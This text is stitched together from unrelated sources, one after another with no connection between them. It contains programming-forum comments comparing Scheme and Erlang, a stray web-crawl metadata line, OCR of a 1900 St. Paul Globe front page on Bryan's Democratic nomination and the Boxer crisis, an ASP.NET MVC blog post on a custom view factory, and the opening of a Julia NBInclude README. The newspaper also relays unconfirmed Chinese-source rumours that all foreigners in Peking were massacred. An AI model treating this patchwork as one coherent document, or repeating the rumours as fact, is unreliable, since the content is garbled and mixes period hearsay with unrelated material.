- The @__FILE__ macro returns /path/to/myfile.ipynb:In[N] for input cell N.
- Like include, nbinclude works fine with parallel Julia processes, even for worker processes (from Julia's addprocs) that may not have filesystem access. (Do import NBInclude; @everywhere using NBInclude to use nbinclude on all processes.)
- In IJulia, cells beginning with ; or ? are interpreted as shell commands or help requests, respectively. Such cells are ignored by nbinclude.
- The counters and regex keywords can be used to restrict the included cells to those for which counter ∈ counters and the cell text matches regex. For example, nbinclude("notebook.ipynb"; counters=1:10, regex=r"#\s*EXECUTE") would include cells 1 to 10 from notebook.ipynb that contain comments like # EXECUTE.
- An anshook keyword can be used to run a passed function on the return value of all the cells.
To install it, simply do
Pkg.add("NBInclude") as usual for Julia packages.
NBInclude was written by Steven G. Johnson and is free/open-source software under the MIT/Expat license. Please file bug reports and feature requests at the NBInclude github page.
Introduction to Pandas left join
A Pandas left join keeps every row of the left dataframe. Where there are missing values of the on key in the right dataframe, it fills in empty/NaN values in the result. The plain Pandas merge operation defaults to an inner merge. An inner merge, or inner join, keeps only the values common to both the left and right dataframes in the result. In our example above, only the rows that contain use_id values common to user_usage and user_device remain in the result dataset. We can validate this by looking at how many values are common. In the output, rows from the left and right dataframes are matched up where there are common values of the merge column specified by on.
Syntax and Parameters
pandas.merge(left, right, how='inner', on=None, left_on=None, right_on=None, left_index=False, right_index=False, sort=True)
Where,
- left and right are the two DataFrame objects to be merged.
- on gives the column names to join on; they must be found in both the left and right DataFrame objects.
- left_on and right_on give the columns from the left and right DataFrame to use as keys. They can either be column names or arrays with length equal to the length of the DataFrame.
- left_index and right_index mean: if True, use the index (row labels) from the left and right DataFrame as its join key. In the case of a DataFrame with a MultiIndex (hierarchical), the number of levels must match the number of join keys from the other DataFrame.
- sort sorts the result DataFrame by the join keys in lexicographical order. It defaults to True; setting it to False will improve performance substantially in many cases.
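As a minimal sketch of these parameters in action (the frames and column names here are invented for illustration):

```python
import pandas as pd

left = pd.DataFrame({"id": [1, 2], "name": ["Ann", "Ben"]})
right = pd.DataFrame({"id": [2, 3], "score": [90, 75]})

# Keep every row of `left`; the id with no match gets NaN in `score`.
out = pd.merge(left, right, on="id", how="left", sort=True)
print(out)
```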
How left join works in Pandas?
The examples below show how left join works in pandas:
Example #1
Code:
import pandas as pd
left = pd.DataFrame({
'id':[6,7,8,9,3],
'Name': ['Span', 'Vetts', 'Sucu', 'Appu', 'Sri'],
'subjects':['Mat','Sci','Soc','En','Kan']})
print (left)
Output:
In the above program, we first import the pandas library as pd and then define a dataframe. This dataframe will serve as the left side of the join; we print it to show its contents.
Example #2
Code:
import pandas as pd
left = pd.DataFrame({
'Sr':[6,7,8,9,2],
'Name': ['Span', 'Suchu', 'Vetts', 'Appu', 'Sri'],
'subjects':['Math','Sci','Soc','Eng','Kan']})
right = pd.DataFrame({
'Sr':[6,7,8,9,2],
'Name': ['fil', 'mil', 'sil', 'pil', 'gil'],
'subjects':['Sans','Hin','Eng','Kan','Beng']})
print(pd.merge(left, right, on='Sr', how='left'))
Output:
In the above program, we first import pandas as pd and then define the two dataframes. After defining them, we call pd.merge with how='left', which keeps every row of the left dataframe, and thus the output is as shown in the above snapshot.
We expect the result to have the same number of rows as the left dataframe, because each use_id in user_usage appears only once in user_device. A one-to-one mapping is not always the case, however. In merge operations where a single row in the left dataframe is matched by multiple rows in the right dataframe, multiple result rows will be generated. For instance, if a use_id value in user_usage appears twice in the user_device dataframe, there will be two rows for that use_id in the join result.
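This row multiplication can be sketched with small made-up frames (not the article's actual dataset):

```python
import pandas as pd

# One row on the left for use_id 2 ...
user_usage = pd.DataFrame({"use_id": [1, 2], "monthly_mb": [500, 1200]})

# ... but two matching rows on the right for use_id 2.
user_device = pd.DataFrame({"use_id": [1, 2, 2],
                            "device": ["one_touch", "galaxy_s7", "galaxy_s8"]})

result = pd.merge(user_usage, user_device, on="use_id", how="left")
print(result)
# use_id 2 now appears twice in the result: one output row per match.
```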
You can change the merge to a left merge with the how parameter of your merge command. The top of the result dataframe then contains the successfully matched items, and the bottom contains the rows in user_usage that did not have a corresponding use_id in user_device.
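The matched/unmatched split described above can be made explicit with the indicator option (again with invented frames):

```python
import pandas as pd

user_usage = pd.DataFrame({"use_id": [1, 2, 3], "monthly_mb": [500, 1200, 300]})
user_device = pd.DataFrame({"use_id": [1, 3], "device": ["one_touch", "galaxy_s7"]})

# how="left" keeps every row of user_usage; indicator=True adds a
# _merge column saying whether each row found a match on the right.
result = pd.merge(user_usage, user_device, on="use_id",
                  how="left", indicator=True)
print(result)
# use_id 2 gets NaN for device and _merge == "left_only".
```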
You could write for loops for this task. The first would loop through the use_id values in the user_usage dataset, and then find the matching element in user_device. A second for loop would repeat this process for the devices. However, using for loops would be much slower and more verbose than using the Pandas merge functionality, so if you come across this situation, do not use for loops.
There are linking values between the sample datasets that are important to note – use_id is shared between user_usage and user_device, and the device column of user_device and the Model column of the devices dataset contain common codes.
Conclusion
Thus, we would like to conclude by stating that the merge command is the key learning goal of this post. The merge operation at its simplest takes a left dataframe (the first argument), a right dataframe (the second argument), and then a merge column name, or a column to merge on. With this result, we can now move on to getting the manufacturer and model number from the devices dataset. But first we need to understand a bit more about merge types and the shape of the output dataframe. The words "merge" and "join" are used largely interchangeably in Pandas and other languages, namely SQL and R. In Pandas, there are separate merge and join functions, both of which do similar things.
Recommended Articles
This is a guide to Pandas left join. Here we discuss the introduction to Pandas left join and how left join works with examples. You may also have a look at the following articles to learn more – | https://www.educba.com/pandas-left-join/?source=leftnav | CC-MAIN-2021-25 | refinedweb | 923 | 61.26 |
After a Python-based Spark cluster is created, you can submit a job. This topic uses a Python-based Spark job in an example.
Note: When you create a Python-based Spark cluster, you must use the image of version
spark_2_4_5_dla_0_0_2.
Python-based Spark is available in the China (Shenzhen) region and will be available in other regions.
1. Prepare the test data
Generate a CSV file named
staff.csv and upload it to Object Storage Service (OSS).
The CSV file lists the information and income of each employee.
name,age,gender,salary
Lucky,25,male,100
Lucy,23,female,150
Martin,30,male,180
Rose,31,female,200
2. Develop a dependency method
To calculate the after-tax income of each employee, create a file named
func.py, write a
tax method to it, and register the method as a Spark user-defined function (UDF) to facilitate subsequent operations.
Sample code:
def tax(salary):
    """
    Convert the salary string to int, then compute 15% tax on the salary.
    Returns a float number.
    :param salary: The salary of a staff worker
    :return: the tax amount (15% of the salary)
    """
    return 0.15 * int(salary)
To introduce the tax method by using
pyFiles, store the method in a ZIP-compressed package.
The following figure shows the directory structure of the compressed package.
Based on Python syntax, a module named
tools is created, and the
func.tax method is stored under the tools module.
Compress the depend folder as
depend.zip and upload the package to OSS.
3. Develop the main program
Develop a Python-based Spark program to read the data in the CSV file from OSS, and register the CSV file as a
DataFrame. Register the
tax method in the depend.zip dependency package as a
Spark UDF. Then, use the
Spark UDF to calculate the
DataFrame and generate the results.
Replace
{your bucket} with the name of your OSS bucket in the following sample code:
from __future__ import print_function
from pyspark.sql import SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import FloatType

# import third part file
from tools import func

if __name__ == "__main__":
    # init pyspark context
    spark = SparkSession\
        .builder\
        .appName("Python Example")\
        .getOrCreate()

    # read csv from oss to a dataframe, show the table
    df = spark.read.csv('oss://{your bucket}/staff.csv', mode="DROPMALFORMED",
                        inferSchema=True, header=True)
    # print schema and data to the console
    df.printSchema()
    df.show()

    # create an udf
    taxCut = udf(lambda salary: func.tax(salary), FloatType())

    # cut tax from salary and show result
    df.select("name", taxCut("salary").alias("final salary")).show()
    spark.stop()
Write the preceding code to the
example.py file and upload the file to OSS.
4. Submit the job
Create a cluster. When you create the cluster, select the latest Spark image version
spark_2_4_5_dla_0_0_2.
In the left-side navigation pane of the DLA console, choose Serverless Spark > Submit job. On the page that appears, click Create Job. In the dialog box that appears, complete the settings and submit the following job information:
{
    "name": "Spark Python",
    "file": "oss://{your bucket name}/example.py",
    "pyFiles": ["oss://{your bucket name}/depend.zip"],
    "conf": {
        "spark.driver.resourceSpec": "small",
        "spark.executor.instances": 2,
        "spark.executor.resourceSpec": "small",
        "spark.dla.connectors": "oss",
        "spark.kubernetes.pyspark.pythonVersion": "3"
    }
}
Replace
{your bucket name} with the name of your OSS bucket. In this example, Python 3 is used to run this job. You can specify the
spark.kubernetes.pyspark.pythonVersion parameter to decide which version of Python is used the same as what you do to Spark community versions. If you do not specify this parameter, Python 2.7 is used. | https://www.alibabacloud.com/help/doc-detail/173152.htm | CC-MAIN-2020-40 | refinedweb | 594 | 60.61 |
I think everyone who has ever worked with big data is already familiar with Hadoop clusters. There are many Hadoop distributions available, like Hortonworks or Cloudera. But you can also provision the cluster in the cloud. Microsoft Azure offers a service called HDInsight that can be used to quickly spin up big data clusters without thinking about the underlying infrastructure. It seamlessly integrates with Azure Data Lake Storage or Azure Storage Accounts, creating a resilient and cost-effective solution. If you prefer PaaS services as I do, then you should definitely check it out.
The SAP Data Hub and SAP Vora run on Kubernetes engine and if you’d like to follow this guide I highly recommend to use my previous post where I describe how to make it running in Azure.
To enable the integration between SAP Vora and the Hadoop cluster we need to install the Spark extension available to download from SAP Launchpad. Depending if you’re running a pure Vora or the DataHub + Vora you should download the correct package:
SAP Vora 2 Spark Extension – when you have a pure SAP Vora installation
SAP Data Hub Spark Extension – when working with SAP Data Hub
There are a few differences between those products but in most cases, it uses the same code base. The major difference I noticed is different handling of authentication, as the SAP Data Hub implements multitenancy. In the following guide, I will focus on the SAP Data Hub extension, but the steps in the majority will work exactly the same for the SAP Vora plug-in. To get a full understanding of how to implement the connection I decided to follow the manual installation mode. As always I recommend getting familiar with the Installation Guide which contains much valuable information.
PROVISION HDINSIGHT CLUSTER
I think deployment of HDInsight cluster is quite complex compared to other Azure PaaS services and requires a bit of Hadoop understanding. But if you follow my steps you should not encounter any issues. The very first question to consider is what sort of the HDInsight cluster you need. The Azure choice is quite large and you can choose from seven different configurations that include solution optimized for data analytics (Spark), NoSQL (HBase) or messaging (Kafka).
When creating an HDInsight cluster in Hadoop I found it better to switch to the Custom settings as it gives much more control over the server configuration. As I want to focus on the data analytics I decided to go with the Spark cluster. If you choose a different type there it may be required to perform additional configuration.
Let’s begin! Open HDInsight from the available services and choose the name of the cluster. Type the default password, which will be used also to connect to the cluster nodes through SSH.
The second step focuses on the networking so I choose to connect the service to my default VNet – it will simplify the connection to the SAP Vora. To separate the traffic between different Azure services I created additional subnet just for HDInsight workload:
The thirds step is all about the storage. There is a significant difference between HDInsight and other Hadoop distributions. Usually the storage is distributed across nodes that belong to the cluster, but HDInsight natively integrates with Data Lake or Storage Account. Such implementation have a number of benefits like lower cost of storing the data or possibility to destroy the cluster and keeping the data at the same time.
You can choose to use the ADLS or the Storage Account as the underlying file system. I decided to go with the Data Lake as it’s optimized for parallel processing and therefore suits the HDInsight better. The blob storage has certain limitations, like the maximum available space.
There is also a requirement to configure the Service Principal to enable access to ADLS storage. You can create the account directly in the portal. The advantage is that it automatically creates the certificate that will be used for authentication which makes the process easier.
The service principal requires POSIX (rwx) permissions to read and write to Data Lake storage. Click on the Access entry and you’ll be redirected to a wizard, where you select the account and choose permissions.
Confirm by clicking Select and choose Run on the next screen.
Leave the default settings on the optional step Application and stop for a moment when deciding about the cluster size. Depending on the usage and resiliency requirements you can choose how many worker nodes you want to deploy. As I will use the cluster just for testing purposes I decided to go with a single worker node. You can adjust the number and the size of nodes after the cluster is provisioned. To ensure the system is highly available you can’t decrease the number of head nodes below two.
You don’t have to maintain any custom script actions in the sixth step so you can jump to cluster validation and deployment:
INSTALL SAP DATA HUB SPARK EXTENSION
After around 20 minutes the cluster is deployed and we can start the installation of the Spark extension. You can log in to the operating system of the master node using the following command:
ssh <username>@<cluster_name>-ssh.azurehdinsight.net
Execute following commands to list all nodes that belongs to the cluster:
export CLUSTERNAME=<cluster_name>
curl -u admin -sS -G "" | jq '.items[].Hosts.host_name'
Download the Spark extension to a temp directory and unzip the file. We need to upload the spark-sap-datasources-spark2.jar to ADLS filesystem and then we will write a script that will distribute the file to all HDInsight nodes.
unzip DHSPARKINT04_1-70003482.ZIP
hadoop fs -mkdir /SAPVora/
hadoop fs -put SAPDataHub-SparkExtension/spark-sap-datasources-spark2.jar /SAPVora/
Now create a script that will distribute the file to each cluster node and upload it to the ADLS:
vi distribute-Spark.sh

#!/bin/bash
mkdir /opt/SAPVora/
hadoop fs -get /SAPVora/spark-sap-datasources-spark2.jar /opt/SAPVora/
We can automate the distribution of the Spark extension file to each node using the HDInsight Script Action. Go to the Azure portal and open the cluster configuration. Choose Script Action from the menu and click Submit New.
The script type should be set to Custom. Type the desired script name. The uploaded script URL follows the format:
adl://<ADLS_name>.azuredatalakestore.net/clusters/<cluster_name>/SAPVora/distribute-Spark.sh
The script should be executed on head nodes and worker nodes.
It takes a few seconds to execute the script. If everything went well, you will see a green mark next to the script name:
You can verify the file exists on the master node:
ls -ltr /opt/SAPVora
CONFIGURE SPARK
The first step in order to configure the SAP Data Hub Spark Extension is to identify the hostname and the port number of the tx-coordinator service on the SAP Data Hub cluster.
Log in to the Kubernetes cluster dashboard using following PowerShell command from your local computer:
az aks browse --resource-group <AKS_Resource_Group> --name <AKS_Name>
In the Kubernetes Dashboard click on Services and find the vora-tx-coordinator-ext service.
You’re interested in the node hostname and the endpoint port
Note: your SAP Vora and the HDInsight cluster have to be able to communicate with each other. My scenario uses the same VNet for both services, but if that’s not the case for you, you should expose the vora-tx-coordinator-ext externally.
Now we can configure the Spark2 component through the Ambari UI, which can be accessed through a web browser. The URL follows the format:
https://<cluster_name>.azurehdinsight.net
Do not enter the configuration directly to the files on the nodes, as whenever you restart the Spark service the settings will be overwritten.
Click on Spark2 and then choose Configs from the top menu. In the long list of files find Custom spark2-defaults. Add the below parameters:
Save the settings and restart affected services. We can now validate the connection between HDInsight and the SAP Vora. Go back to the Master Node of the Hadoop cluster and launch Scala:
spark-shell --jars /opt/SAPVora/spark-sap-datasources-spark2.jar
Execute the following commands in the editor:
If the above commands were executed successfully and you didn’t receive any exceptions it means the installation is complete and we can try to execute a more advanced test!
LOAD DATA TO SAP VORA AND ACCESS THEM IN SPARK
Currently, SAP Vora extension for Spark doesn’t support Data Lake authentication using certificates, therefore we need to set up a new Service Principal that will be used to access the ADLS from the Vora tools. If you have followed my previous post about extracting data you can re-use the same username and password. If not, then execute the following script:
$SPName = "dataextractSP"
$URI = "http://" + $SPName
$app = New-AzADApplication -DisplayName $SPName -IdentifierUris $URI
$servicePrincipal = New-AzADServicePrincipal -ApplicationId $app.ApplicationId
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($servicePrincipal.Secret)
$password = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
[Runtime.InteropServices.Marshal]::ZeroFreeBSTR($BSTR)
$tenant = Get-AzTenant
Write-Host ''
Write-Host 'Below information will be required during SAP Data Hub configuration:'
Write-Host 'Service Principal Name      :' $SPName
Write-Host 'Service Principal Tenant ID :' $tenant.Id
Write-Host 'Service Principal Client ID :' $app.ApplicationId
Write-Host 'Service Principal Key       :' $password
Assign full permissions to the Data Lake in the Azure portal. I selected the option to save the permissions as defaults; otherwise, if you create new files or directories, the service principal won't inherit the access from the parent.
Log in to HDInsight through SSH and download the test dataset containing airports from around the world and upload it to the Azure Data Lake:
wget
Now log in to the SAP Vora Tools and create a new relational table using the service principal credentials and pointing to the downloaded file:
In the next step I corrected the column names and the data types. I think SAP Vora tries to identify the correct data type based on the first row only (which is a bad idea), so initially I ran into many mapping issues. But after setting the below parameters the import went fine.
You can see a data preview in the Vora Tools:
Now let’s try to access the table in Spark and do some operations. Open Spark and establish a connection with SAP Vora as we did before. But this time instead of selecting a dummy data I will display a few rows from the uploaded dataset.
spark-shell --jars /opt/SAPVora/spark-sap-datasources-spark2.jar

import sap.spark.vora.PublicVoraClientUtils
import sap.spark.vora.config.VoraParameters

val client = PublicVoraClientUtils.createClient(spark)
client.query("""select "Country", "IATACode", "Name", "City" from "default"."airports" where "Country"='Poland'""").foreach(println)
Let’s import that list to a DataFrame count the rows:
val airport_DF = spark.read. format("sap.spark.vora"). option("table", "airports"). option("namespace", "default"). load()
We can save the DataFrame to Hive Metastore:
airport_DF.write.
  format("orc").
  saveAsTable("airport_orc")

spark.sql("""SELECT * FROM airport_orc WHERE COUNTRY='Poland'""").show()
And to finish I’m going to create a table in SAP Vora and transfer subset of data from the Hive metastore.
import org.apache.spark.sql.SaveMode

client.execute("""CREATE TABLE "default"."airports_poland" ("City" VARCHAR(40), "Name" VARCHAR(70), "ICAOCode" CHAR(4)) TYPE STREAMING STORE ON DISK""")

val airports_poland_DF = spark.sql("""SELECT City, Name, ICAOCode FROM airport_orc WHERE COUNTRY='Poland'""")
airports_poland_DF.count()
airports_poland_DF.show()

airports_poland_DF.write.
  format("sap.spark.vora").
  option("table", "airports_poland").
  option("namespace", "default").
  mode(SaveMode.Append).
  save()
You can verify the table exist in the SAP Vora Tools:
ACCESS SAP VORA FROM THE HANA DATABASE
There is one more thing I would like to present. The big advantage of the SAP VORA is that it can expose the data stored in the Hadoop cluster to the SAP HANA database. We have a sample data uploaded to the storage, so let’s try to set up the connection.
The SAP HANA Wire protocol is enabled by default on the SAP Vora installation, so we just need to configure the remote connection in SAP HANA. You can get the endpoint details from the Kubernetes Dashboard. The vora-tx-coordinator-ext service expose additional port that should be used:
To create a remote connection, you can either use an SQL command or the SAP HANA Studio.
CREATE REMOTE SOURCE HDInsight_VORA ADAPTER "voraodbc"
CONFIGURATION 'ServerNode=<hostname>:<port>;Driver=libodbcHDB;sslValidateCertificate=false;encrypt=true'
WITH CREDENTIAL TYPE 'PASSWORD' USING 'user=<tenant>\<username>;password="<password>"';
You can also do it from the HANA Studio:
Now I’m able to create a virtual table:
And display the data preview:
The test is completed. As you can see the integration between the HDInsight and the SAP Vora works without any issues and you can easily access the tables from the Spark or HANA database. If you are interested in building more advanced applications check out the SAP Vora Developer Guide.
How to: Add Filter Controls to a Simple List Form
Applies To: Microsoft Dynamics AX 2012 R3, Microsoft Dynamics AX 2012 R2, Microsoft Dynamics AX 2012 Feature Pack, Microsoft Dynamics AX 2012
A simple list or simple list and detail form can include a custom filter group. You use controls in the custom filter group to specify field values. The grid then lists the records that include the specified values. However, a custom filter is optional and is not included on all simple list or simple list and details forms. For more information, see Simple List Forms Overview.
To enable a form to be filtered, you add one or more controls to the custom filter group of the form. Typically, the custom filter group appears under the action pane strip and the optional page title group. To learn about the page title group, see How to: Add a Page Title Group to a Simple List Form.
To add the custom filter group
In the AOT, expand Forms, and then expand the form where you want to add the custom filter group.
Note
If you use a template to create the simple list or simple list and details form, a custom filter group control was already added to the Design node of the form. To use the existing filter group, go to the procedure that describes how to add a control to the group.
Expand Designs, right-click Design, click New Control, and then click Group. A group control is added to the form. Use the ALT+UP ARROW or ALT+DOWN ARROW to move the group. Move the custom filter group so that it appears under the action pane control. If the form includes a page title group, move the custom filter group under the page title group.
Right-click the group control, and then click Properties. In the properties sheet, verify the following property values:
Right-click the form and then click Save.
To add a control to the custom filter group
In the AOT, expand Forms, and then expand the form where you want to add fields to the filter group.
Expand Designs, expand Design, right-click CustomFilterGroup, click New Control, and then click the type of control you want to use. The control is added to the group.
For example, click ComboBox to add a field that you can use to show enum or EDT values. To specify the values that appear in the control, use the EnumType or ExtendedDataType property. For example, the filter control of the BudgetTransactionInquiry form sets the EnumType property to AllDraftCompleted.
Expand the control node, right-click Methods, click Override methods, and then click modified. The method opens in the code editor.
Add code to the method that updates the form by using the specified filter value. Add the code after the call to super in the modified method.
The following code example shows how to refresh the form after a value is selected in the filter control. In this example, Table1_ds is the data source for the form. To follow the example, you would replace Table1_ds with the name of the table in the data source of the form.
public boolean modified() { boolean ret; ret = super(); // A new filter value has been selected; refresh the form using that filter value. Table1_ds.executeQuery(); return ret; }
To use the control value to filter the form
Expand the Methods node of the form, right-click classDeclaration, and then click View Code. The method opens in the Editor window.
In the classDeclaration method, declare a variable of type QueryFilter. The following code example shows how to declare a variable named queryFilter.
public class FormRun extends ObjectRun { QueryFilter queryFilter; }
Expand the Data Sources node, and then find the table that has the field that has the values that you will use to filter the list.
Expand the table node, right-click Methods, click Override method, and then click init. The method opens in the Editor window.
Use the addQueryFilter method of the data source query to initialize queryFilter. Add your code after the call to super. Use the addQueryFilter method to specify the table and field you will use to filter the list. The method returns a QueryFilter object. For information about the QueryFilter class, see How to: Use the QueryFilter Class with Outer Joins.
The following code example initializes queryFilter. In this example, Table1_ds represents the data source for the form. In addition, relatedID specifies the name of a field in Table1. To follow the example, replace Table1_ds and relatedID with the name of a table and a field from the data source of the form.
public void init() { super(); // Add a filter to the query. Specify the field to use in the filter. queryFilter = Table1_ds.query().addQueryFilter(Table1_ds.queryBuildDataSource(),"relatedID"); }
In the same table, right-click the Methods, click Override method, and then click executeQuery. The method opens in the Editor window.
Associate the value of the filter group control you added earlier with the queryFilter object. Add your code before the call to super.
The following code example uses the value of a control named ComboBox to specify the value for the queryFilter object. To follow the example, replace ComboBox with the name of the filter control you added earlier.
public void executeQuery()
{
    // Get the filter value from the filter control.
    queryFilter.value(element.design().controlName("ComboBox").valueStr());

    super();
}
Note
If the filter creates a new record when you expect the form to be empty, set the ViewEditMode property in the Design node of the form to View.
Right-click the form, and then click Save.
See also
How to: Create a Simple List Form
How to: Create a Simple List and Details Form
Hello,
I am trying to figure out how or what looping method
to use to read multiple data from a file.
The file has several income brackets (A, B, & C), and some ratings for product1 and product2.
The data file looks like this:
Code:
A 5 7
A 4 8
A 3 9
B 2 7
C 1 6
C 8 2
A 7 5
B 6 9

What I want to do is read in and calculate the average rating for product 1 (the first number)
that bracket A rated, then bracket B,
and finally C.
I have figured out how to read A or B or C,
by using an if statement and simply changing
the argument to A or B or C,
but I don't know how to have it read the data for A,
then read B, and then C without intervening.
Here is the code I have so far:
Code:
/* This program will display for each income bracket (A, B, & C) the average rating for
 * product 1.
 */
#include <iostream>   // cout, cin, <<, >>
#include <string>     // string
#include <cstdlib>    // exit()
#include <cassert>    // assert
#include <fstream>    // ifstream
using namespace std;

char income, c;
int count, incomeB5Up, prod2Ave;
double prod1Total;
double prod1AveA, prod1AveB;
double prod1, prod2;

int main()
{
    string fileName;

    cout << "Enter name of file: ";
    getline(cin, fileName);

    ifstream inFile(fileName.data());
    assert(inFile.is_open());

    while (inFile.get(c))
    {
        if (c == 'A')   /* get income bracket A information */
        {
            count++;
            inFile >> prod1 >> prod2;
            cout << "Product 1 rating: " << prod1
                 << " Product 2 rating: " << prod2
                 << " Count: " << count << "\n";   // display prod ratings read from file

            prod1Total += prod1;
            cout << "Prod1Total = " << prod1Total << "\n";   // display prod1 total

            prod1AveA = prod1Total / count;
            cout << "Average for Product 1 in income class A: " << prod1AveA << "\n\n";
        }
    }
    cout << "Average for Product 1 in income class A: " << prod1AveA << "\n\n";
}
Command-line tool that is platform-independent. Its main features are:
This code works on Windows, Linux, and macOS.
You will have to install the Swift standard library. Follow the Swift getting started guide for the platform of your choosing.
You will need to know how to use the Swift Package Manager.
Integrate it into an application using SPM, in
Package.swift
.package(name: "ProcessPretty", url: "", <#wanted version#>)
more info on
In a main.swift file or a type annotated with
@main
Add
import ProcessPretty to the beginning of every file.
let echoSync = try ProcessPretty(executable: "echo", arguments: ["something to output in sync"])

func sync() {
    do {
        try echoSync.run(in: #function, at: #filePath)
    } catch {
        exit(EXIT_FAILURE)
    }
}

sync()
This looks up the task among the executables accessible via PATH. If the executable for the process to run is not found, update the PATH value.
Inspiration for this is taken from jakeheis/SwiftCLI. SwiftCLI does more than just run a system process. It also provides Commands, a structured way to add arguments and options to a process you run on the command line. As for commands, we use Apple's swift-argument-parser; SwiftCLI was too big to use. But the way to run a task is taken from that project and used here.
I've been developing webparts that use regular ASP.NET Usercontrols as content for a while. Up until now we've simply hardcoded the url to the usercontrol location in the webpart class. Moving towards a more standardized product that must support differentiated deployment environments, I wanted to place the url to the usercontrol in the webpart dwp file.
The docs available online describe how to annotate the property to read from the dwp file, much like this:
Then you see this in the dwp file template:
<!-- Specify initial values for any additional base class or custom properties here. -->
Well, simply adding an element with the same name as the property won't work. Some additional guidance from Redmond SharePoint team-guy Scott pointed out the missing link:
You've got to annotate the webpartclass with a reasonable namespace like this:
[DefaultProperty("Text"), ToolboxData("<{0}:SearchForm runat=server></{0}:SearchForm>"),XmlRoot(Namespace=""
And then tag your property elements in the dwp file with the same xmlns:
<UserControl xmlns="">URI</UserControl>
And your webpart has an initial property value after deployment. Thanks Scott!
Awesome. I couldn't figure it out either. Thanks.
I don't want to declare the URL but as soon as I try anything else it doesn't work.
What might I have to define to have my own Namespace?
Need help about this...
Thanks by advance
How to apply validation for custom properties?
Pingback from User Control Container Web Part « Sharepoint Musing’s
fdopendir - Man Page
open directory associated with file descriptor
Prolog
This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
Synopsis
#include <dirent.h> DIR *fdopendir(int fd); DIR *opendir(const char *dirname);
Description
The fdopendir() function shall be equivalent to the opendir() function except that the directory is specified by a file descriptor rather than by a name. The file offset associated with the file descriptor at the time of the call determines which entries are returned. Upon successful return from fdopendir(), the file descriptor is under the control of the system, and if any attempt is made to close the file descriptor, or to modify the state of the associated description, other than by means of closedir(), readdir(), readdir_r(), rewinddir(), or seekdir(), the behavior is undefined. Upon calling closedir() the file descriptor shall be closed.
It is unspecified whether the FD_CLOEXEC flag will be set on the file descriptor by a successful call to fdopendir(). The opendir() function shall open a directory stream corresponding to the directory named by the dirname argument. The directory stream is positioned at the first entry.
If the type DIR is implemented using a file descriptor, the descriptor shall be obtained as if the O_DIRECTORY flag was passed to open().
Return Value
Upon successful completion, these functions shall return a pointer to an object of type DIR. Otherwise, these functions shall return a null pointer and set errno to indicate the error.
Errors
The fdopendir() function shall fail if:
- EBADF
The fd argument is not a valid file descriptor open for reading.
- ENOTDIR
The descriptor fd is not associated with a directory.
The opendir() function shall fail if:
- EACCES
Search permission is denied for the component of the path prefix of dirname or read permission is denied for dirname.
- ELOOP
A loop exists in symbolic links encountered during resolution of the dirname argument.
- ENAMETOOLONG
The length of a component of a pathname is longer than {NAME_MAX}.
- ENOENT
A component of dirname does not name an existing directory or dirname is an empty string.
- ENOTDIR
A component of dirname names an existing file that is neither a directory nor a symbolic link to a directory.
The opendir() function may fail if:
- ELOOP
More than {SYMLOOP_MAX} symbolic links were encountered during resolution of the dirname argument.
The following sections are informative.
Examples
Open a Directory Stream
The following program fragment demonstrates how the opendir() function is used.
#include <dirent.h> ... DIR *dir; struct dirent *dp; ... if ((dir = opendir (".")) == NULL) { perror ("Cannot open ."); exit (1); } while ((dp = readdir (dir)) != NULL) { ...
Find And Open a File
The following program searches through a given directory looking for files whose name does not begin with a dot and whose size is larger than 1 MiB.
#include <stdio.h> #include <dirent.h> #include <fcntl.h> #include <sys/stat.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { struct stat statbuf; DIR *d; struct dirent *dp; int dfd, ffd; if ((d = fdopendir((dfd = open("./tmp", O_RDONLY)))) == NULL) { fprintf(stderr, "Cannot open ./tmp directory\n"); exit(1); } while ((dp = readdir(d)) != NULL) { if (dp->d_name[0] == '.') continue; /* there is a possible race condition here as the file * could be renamed between the readdir and the open */ if ((ffd = openat(dfd, dp->d_name, O_RDONLY)) == -1) { perror(dp->d_name); continue; } if (fstat(ffd, &statbuf) == 0 && statbuf.st_size > (1024*1024)) { /* found it ... */ printf("%s: %jdK\n", dp->d_name, (intmax_t)(statbuf.st_size / 1024)); } close(ffd); } closedir(d); // note this implicitly closes dfd return 0; }
Application Usage
The opendir() function should be used in conjunction with readdir(), closedir(), and rewinddir() to examine the contents of the directory (see the Examples section in readdir()). This method is recommended for portability.
Rationale
The purpose of the fdopendir() function is to enable opening files in directories other than the current working directory without exposure to race conditions. Any part of the path of a file could be changed in parallel to a call to opendir(), resulting in unspecified behavior.
Based on historical implementations, the rules about file descriptors apply to directory streams as well. However, this volume of POSIX.1-2017 does not mandate that the directory stream be implemented using file descriptors.
Future Directions
None.
See Also
closedir(), dirfd(), fstatat(), open(), readdir(), rewinddir(), symlink()
closedir(3p), dirent.h(0p), dirfd(3p), fstatat(3p), ftw(3p), glob(3p), nftw(3p), open(3p), readdir(3p), rewinddir(3p), seekdir(3p), symlink(3p), telldir(3p)
I first learned programming in BASIC. Outgrew it, and switched to Fortran. Amusingly, my early Fortran code looked just like BASIC. My early C code looked like Fortran. My early C++ code looked like C. – Walter Bright, the creator of D
Programming in a language is not the same as thinking in that language. A natural side effect of experience with one programming language is that we view other languages through the prism of its features and idioms. Languages in the same family may look and feel similar, but there are guaranteed to be subtle differences that, when not accounted for, can lead to compiler errors, bugs, and missed opportunities. Even when good docs, books, and other materials are available, most misunderstandings are only going to be solved through trial-and-error.
D programmers come from a variety of programming backgrounds, C-family languages perhaps being the most common among them. Understanding the differences and how familiar features are tailored to D can open the door to more possibilities for organizing a code base, and designing and implementing an API. This article is the first of a few that will examine D features that can be overlooked or misunderstood by those experienced in similar languages.
We’re starting with a look at a particular feature that’s common among languages that support Object-Oriented Programming (OOP). There’s one aspect in particular of the D implementation that experienced programmers are sure they already fully understand and are often surprised to later learn they don’t.
Encapsulation
Most readers will already be familiar with the concept of encapsulation, but I want to make sure we’re on the same page. For the purpose of this article, I’m talking about encapsulation in the form of separating interface from implementation. Some people tend to think of it strictly as it relates to object-oriented programming, but it’s a concept that’s more broad than that. Consider this C code:
#include <stdio.h>

static size_t s_count;

void print_message(const char* msg)
{
    puts(msg);
    s_count++;
}

size_t num_prints()
{
    return s_count;
}
In C, functions and global variables decorated with
static become private to the translation unit (i.e. the source file along with any headers brought in via
